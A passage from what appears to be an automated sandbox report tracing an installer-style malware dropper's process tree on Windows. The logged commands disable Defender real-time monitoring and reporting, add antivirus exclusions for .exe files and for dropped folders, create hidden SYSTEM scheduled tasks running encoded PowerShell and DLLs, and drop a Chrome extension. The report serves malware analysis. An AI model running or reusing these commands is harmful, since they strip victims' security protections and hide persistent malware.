wrote to memory of 2620 2548 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\7zS5013.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\7zS5226.tmp\Install.exe.\Install.exe /OUdidfQn "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2544
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2600
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2568
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2620
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSWiwdvBF" /SC once /ST 11:07:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSWiwdvBF"4⤵PID:2344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSWiwdvBF"4⤵PID:1668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbPqNtaaeFeEtSKaKR" /SC once /ST 18:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\VUHPWtm.exe\" 8N /qxsite_idIGO 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2160
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3C965E1A-0F07-445A-9B04-0EEA4887138F} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]1⤵PID:2528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1196
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2664
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3028
-
C:\Windows\system32\taskeng.exetaskeng.exe {844FD9B2-A621-49CB-A203-C8387BA80896} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\VUHPWtm.exeC:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\VUHPWtm.exe 8N /qxsite_idIGO 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmRhySNwL" /SC once /ST 13:45:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmRhySNwL"3⤵PID:2384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmRhySNwL"3⤵PID:2392
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2016
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1356
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRfXvVkxD" /SC once /ST 01:56:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRfXvVkxD"3⤵PID:1256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRfXvVkxD"3⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:323⤵PID:1316
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:643⤵PID:2056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:323⤵PID:1588
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:643⤵PID:1244
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵PID:2360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\tZRuTBnWsrIvjiMS\CdNarbQP\eRPlKQVHouPxFByP.wsf"3⤵PID:2640
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\tZRuTBnWsrIvjiMS\CdNarbQP\eRPlKQVHouPxFByP.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2736 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:644⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:324⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:644⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:324⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:644⤵PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:324⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:644⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:324⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:644⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:324⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:644⤵PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:324⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:644⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵PID:1604
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goiaYteal" /SC once /ST 02:59:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goiaYteal"3⤵PID:2480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goiaYteal"3⤵PID:2120
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1584
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GVFFxSkoOBQmaesjx" /SC once /ST 17:38:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\yNgrYVo.exe\" Xs /bzsite_idzuK 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GVFFxSkoOBQmaesjx"3⤵PID:2900
-
-
-
C:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\yNgrYVo.exeC:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\yNgrYVo.exe Xs /bzsite_idzuK 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1928 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbPqNtaaeFeEtSKaKR"3⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2560
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2612
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rXjduNqsU\FhMRzS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydgLTpiJkJvZaMG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydgLTpiJkJvZaMG2" /F /xml "C:\Program Files (x86)\rXjduNqsU\YRmTlyd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydgLTpiJkJvZaMG"3⤵PID:1884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydgLTpiJkJvZaMG"3⤵PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KnGwbHArRBeaeV" /F /xml "C:\Program Files (x86)\bNpaxMIFBfOU2\zTkcCtK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PYfufpvJvopmW2" /F /xml "C:\ProgramData\mIZkPWOoOJyyBkVB\qMMcYGi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PjCRMuBebEpnyGhYW2" /F /xml "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\JYSyzHW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pnSNJxEXsCJvVRidMKW2" /F /xml "C:\Program Files (x86)\sExqNpidIxpuC\mShNRbs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jFAecgscnrJhBwrRF" /SC once /ST 01:21:03 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\tZRuTBnWsrIvjiMS\nMnJSQRH\UlJVOFD.dll\",#1 /VKsite_idBSU 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jFAecgscnrJhBwrRF"3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2676
-
